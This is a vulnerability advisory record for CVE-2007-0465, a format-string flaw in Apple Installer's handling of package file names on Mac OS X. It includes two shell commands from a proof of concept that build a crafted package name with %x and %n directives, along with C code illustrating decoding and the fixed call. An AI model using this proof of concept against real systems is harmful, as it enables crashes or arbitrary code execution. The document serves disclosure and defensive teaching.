Apple Installer Package File Name Format String Handling Vulnerability

Vulnerability ID: 1112098    Vulnerability type: Format string
Published: 2007-01-27    Updated: 2007-01-31
CVE: CVE-2007-0465    CNNVD ID: CNNVD-200701-551
Platform: OSX    CVSS score: 7.6
|Vulnerability source
https://www.exploit-db.com/exploits/29532
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-551
|Vulnerability details
Apple Installer is the application responsible for installing Mac OS X software packages. Apple Installer does not handle the package file name string correctly, allowing an attacker to cause a denial of service or execute arbitrary code by supplying a specially crafted format string as a (1) PKG, (2) DISTZ, or (3) MPKG package name.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/22272/info

Apple Installer is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.

A successful attack may crash the application or possibly allow the attacker to execute arbitrary code. This may facilitate unauthorized access or privilege escalation in the context of the user running the application.

Apple Installer Version 2.1.5 on Mac OS X 10.4.8 is vulnerable to this issue; other versions may also be affected. 

$ touch AAAA`ruby -e 'require "cgi"; print CGI::escape("\x9c\xe7\xff\xbf") + CGI::escape("%.20d") + CGI::escape("%x" * 20)'`%n.pkg
$ open AAAA%9C%E7%FF%BF%25.20d%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%n.pkg
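Added example in C, not code from the original advisory or from Apple Installer: a percent-decoder standing in for the step that turns the escaped name in the PoC above into a raw format string, a counter for the printf conversion directives such a decoded name would inject if it were used as a format, and the fixed call shape where the name is passed as a %s argument instead. The names url_decode, count_directives and message_safe are assumptions for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Percent-decode a package file name (assumed stand-in for the decoding
 * that turns "%25.20d" on the command line into "%.20d"). Returns length. */
static size_t url_decode(const char *in, char *out, size_t cap)
{
    size_t n = 0;
    for (size_t i = 0; in[i] != '\0' && n + 1 < cap; i++) {
        if (in[i] == '%' && isxdigit((unsigned char)in[i + 1])
                         && isxdigit((unsigned char)in[i + 2])) {
            char hex[3] = { in[i + 1], in[i + 2], '\0' };
            out[n++] = (char)strtol(hex, NULL, 16);
            i += 2;                      /* consumed the two hex digits */
        } else {
            out[n++] = in[i];
        }
    }
    out[n] = '\0';
    return n;
}

/* Count printf conversion directives in a string that would be used as a
 * format. "%%" is a literal; flags, width, precision, length are skipped. */
static int count_directives(const char *s)
{
    int count = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                     /* "%%" literal */
        while (*p != '\0' && strchr("-+ #0123456789.*hlLqjzt", *p)) p++;
        if (*p == '\0') break;                       /* dangling '%' */
        if (strchr("diouxXeEfFgGaAcspn", *p)) count++;
    }
    return count;
}

/* Fixed shape of the call: the name is an argument to a constant format.
 * The vulnerable shape is snprintf(out, cap, name): name IS the format. */
static int message_safe(char *out, size_t cap, const char *name)
{
    return snprintf(out, cap, "Installing %s", name);
}
```

With the fixed shape, the "%x" and "%n" sequences in the name survive as literal characters in the output instead of being interpreted.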
|References

Source: US-CERT, Name: TA07-109A, Link: http://www.us-cert.gov/cas/techalerts/TA07-109A.html
Source: BID, Name: 22272, Link: http://www.securityfocus.com/bid/22272
Source: MISC, Link: http://projects.info-pull.com/moab/MOAB-26-01-2007.html
Source: XF, Name: macos-installer-format-string(31883), Link: http://xforce.iss.net/xforce/xfdb/31883
Source: SECTRACK, Name: 1017940, Link: http://www.securitytracker.com/id?1017940
Source: OSVDB, Name: 32705, Link: http://www.osvdb.org/32705
Source: VUPEN, Name: ADV-2007-1470, Link: http://www.frsirt.com/english/advisories/2007/1470
Source: SECUNIA, Name: 24966, Link: http://secunia.com/advisories/24966
Source: APPLE, Name: APPLE-SA-2007-04-19, Link: http://lists.apple.com/archives/Security-announce/2007/Apr/msg00001.html
Source: docs.info.apple.com, Link: http://docs.info.apple.com/article.html?artnum=305391